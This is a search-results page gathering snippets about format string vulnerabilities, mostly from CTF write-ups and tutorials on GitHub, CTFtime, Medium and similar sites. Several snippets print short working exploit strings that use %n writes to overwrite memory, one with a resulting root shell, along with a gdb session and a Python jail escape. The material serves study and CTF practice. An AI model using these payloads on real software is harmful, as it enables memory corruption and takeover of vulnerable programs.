🌐
GitHub
github.com › adeptex › CTF › blob › master › fstring-injection.md
CTF/fstring-injection.md at master · adeptex/CTF
Researching f-string revealed that it was likely a new Python format string format (introduced in version 3.6). This fact can be confirmed by registering a valid config entry and then using 3.
Author   adeptex
🌐
Reddit
reddit.com › r/python › be careful with python's new-style string format
r/Python on Reddit: Be Careful with Python's New-Style String Format
December 29, 2016 - I think the problem is not the new-style string format, every input or output must be sanitized if you want keep it safe. If somebody has access to execute a script you already are vulnerable. It's one more thing to escape :/ This CTF questions show how to access python base class easily https://hexplo.it/escaping-the-csawctf-python-sandbox/
🌐
CTFtime.org
ctftime.org › writeup › 9684
CTFtime.org / HITB-XCTF GSEC CTF 2018 Quals / Baby FS / Writeup
The idea is, we can use the attribute of python `str` and also the format string feature to create the `secret` code.
🌐
GitHub
github.com › VulnHub › ctf-writeups › blob › master › 2016 › angstrom-ctf › format-1.md
ctf-writeups/2016/angstrom-ctf/format-1.md at master · VulnHub/ctf-writeups
Here we can see that the string AAAA (41414141) repeats at index 7. This is all I need to write a simple exploit, which looks like this "\x40\xa0\x04\x088x%7$n". The first four bytes \x40\xa0\x04\x08 is the address of secret reversed so it matches little endian. The last part 8x%7$n writes 4+188 bytes to whatever is on index 7, which in our case now is the address of secret. # python2 -c 'print "\x40\xa0\x04\x088x%7$n"' | ./format1 @� 80 sh-4.3# exit
Author   VulnHub
🌐
BreakInSecurity
axcheron.github.io › exploit-101-format-strings
Exploit 101 - Format Strings - BreakInSecurity
April 22, 2018 - gdb-peda$ b *0x00400665 ; Break @printf() Breakpoint 1 at 0x400665 gdb-peda$ b *0x0040066a ; Break right after printf() Breakpoint 2 at 0x40066a gdb-peda$ run < <(python -c 'print "\xac\xf6\xff\xbf" + "%7$n"') Starting program: /home/user/format1 < <(python -c 'print "\xac\xf6\xff\xbf" + "%7$n"') [-------------------------------------code-------------------------------------] 0x40065e <main+62>: sub esp,0xc 0x400661 <main+65>: lea eax,[ebp-0x4c] 0x400664 <main+68>: push eax => 0x400665 <main+69>: call 0x400450 <printf@plt> 0x40066a <main+74>: add esp,0x10 0x40066d <main+77>: cmp DWORD PTR [ebp-0xc],0xcafebabe 0x400674 <main+84>: jne 0x40068f <main+111> 0x400676 <main+86>: sub esp,0xc Breakpoint 1, 0x00400665 in main () gdb-peda$ x/x 0xbffff6ac ; Check the value @ 0xbffff6ac 0xbffff6ac: 0xdeadc0de gdb-peda$ continue Continuing.
🌐
Shells
book.jorianwoltjer.com › languages › python
Python | Practical CTF - Jorian Woltjer
December 22, 2025 - Below is a script that finds such cases for a target string: ... The identifier jorianjorian can be replaced with jorianjorian, saving one character. See this site for a table of all Unicode transformations, as this trick is far from the only one. Look for "Normalization NFKC" as Python uses it for resolving function names
🌐
GitHub
github.com › topics › format-string-attack
format-string-attack · GitHub Topics · GitHub
Python script that can be used to craft a string to perform a format string attack in a 32bit system.
🌐
Medium
shadowintel.medium.com › uncontrolled-format-string-ctf-dec7a9aea747
Uncontrolled Format String | CTF. Introduction | by Ahmet Göker | Medium
February 16, 2023 - You should be familiar with string which you want to output, with the help of ‘print()’ · by forcing a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shell-code. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached.
Find elsewhere
🌐
GitHub
github.com › dylanosaur › CTF › blob › main › python-bypasses.md
CTF/python-bypasses.md at main · dylanosaur/CTF
If you send a string to python that is going to be formatted, you can use {} to access python internal information.
Author   dylanosaur
🌐
Podalirius
podalirius.net › en › articles › python-format-string-vulnerabilities
Python format string vulnerabilities · Podalirius
March 24, 2021 - But format string are great in python ! You can access object properties directly in the format string. In the case of a class, this can be really useful to access a specific value in the class.
🌐
Stack Overflow
stackoverflow.com › questions › 65157505 › need-help-on-format-string-vulnerability
c - Need help on format string vulnerability - Stack Overflow
December 5, 2020 - ./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "I6x%n"') The principle is the same in both variants, you pass the address and %n specifier reads amount of bytes passed, because address takes 4 bytes we add 496 bytes with padding. In both of them %n will read next address on the stack, as I understand. Thanks, for your answers. c · stdio · format-string · ctf ·
🌐
CTFtime.org
ctftime.org › writeup › 20654
CTFtime.org / DEF CON CTF Qualifier 2020 / dogooos / Writeup
The `login` method ([dogooo_comments.py](https://raw.githubusercontent.com/m3ssap0/CTF-Writeups/master/DEF CON CTF Qualifier 2020/dogooos/dogooo_comments.py)) uses the *f-Strings* functionality of Python 3, [which is a very powerful formatting syntax](https://realpython.com/python-f-strings/) and can be used to call methods.
🌐
HackMD
hackmd.io › @yqroo › Censorship-series
amateurs CTF Writeups pyjail - HackMD
>>> ''.__mod__([True,False,True,False]) '' ``` it return `''` (empty string) ```python >>> if '': ... print('yes') ... >>> if 'a': ... print('yes') ... yes ``` if we check on if statement the condition won't satisfy, so it's like `False` boolean so let's get the flag!. ```sh ✦8 ❯ nc amt.rs 31671 Give code: any=''.__mod__ Give code: print(_) amateursCTF{sh0uld'v3_r3strict3D_p4r3nTh3ticaLs_1nst3aD} ``` ## Censorship Lite++ Disclaimer on this one!!, i did not solved it during the ctf, i have some idea including brute the flag, but all got stucked because of the restriction (blocklist), but it really brute the flag is the intended way and the only way, the thing is digit is blocked so the trick is by using boolean, after reading some of the solver i understand how to solve this last challenge of the series, but first let's see the program.
🌐
YouTube
youtube.com › watch
Format String Vulnerability Explained | CTF Walkthrough - YouTube
In this video walk-through, we covered a binary vulnerable to format string vulnerability in which the vulnerable code contains an implementation of printf s...
Published   October 14, 2023
🌐
Ctfrecipes
ctfrecipes.com › pwn › stack-exploitation › format-string
Format string | The CTF Recipes
This will output the following string: "The value is 3.14" In this example, the format string is "The value is %.2f\n" and the placeholder is %.2f.
🌐
CTF Support
ctf.support › pwn › format-strings
Format Strings | CTF Support
October 13, 2025 - Stack access syntax can be used by using numbered format parameters to control which stack slot you read from. %1$p - Print first stack pointer as an address %7$s - Interpret 7th stack value as a string
🌐
Medium
medium.com › @fahimalshihabifty › bcs-ctf-2025-exploiting-format-string-vulnerabilities-f6dcad98f314
BCS CTF 2025: Exploiting Format String Vulnerabilities | by Md Fahim Al Shihab | Medium
March 5, 2025 - This challenge demonstrates how format string vulnerabilities can be exploited to modify program execution flow. By identifying the correct offset and memory address, we successfully overwrite the brocode variable and retrieve the flag. If u want more check this also : https://medium.com/@fahimalshihabifty/cscg-2025-intro-to-pwn-2-e63875522242 · Pwn · Binary Exploitation · Ctf Writeup ·
🌐
YouTube
youtube.com › watch
Format String printf Vulnerabilities (PicoCTF 2022 #46 'flag-leak') - YouTube
Help the channel grow with a Like, Comment, & Subscribe! ❤️ Support ➡ https://jh.live/patreon ↔ https://jh.live/paypal ↔ https://jh.live/buymeacoffee Check o
Published   May 13, 2022
🌐
r3v3rs3r
r3v3rs3r.wordpress.com › 2014 › 12 › 26 › i-love-format-string-vulnerabilities
I love format string vulnerabilities! - r3v3rs3r - WordPress.com
December 26, 2014 - While you don’t often find them in common software products you might run up to them in a CTF or Boot2Root challenge. While finding a format string vulnerability is kinda easy, I usually got annoyed when creating the exploit pattern… addresses and values have to be in little-endian, you need to calculate the lengths to write, etc. so decided to write a little helper tool called frmtstr.py. You can either include it into your own python script or run it from the command-line.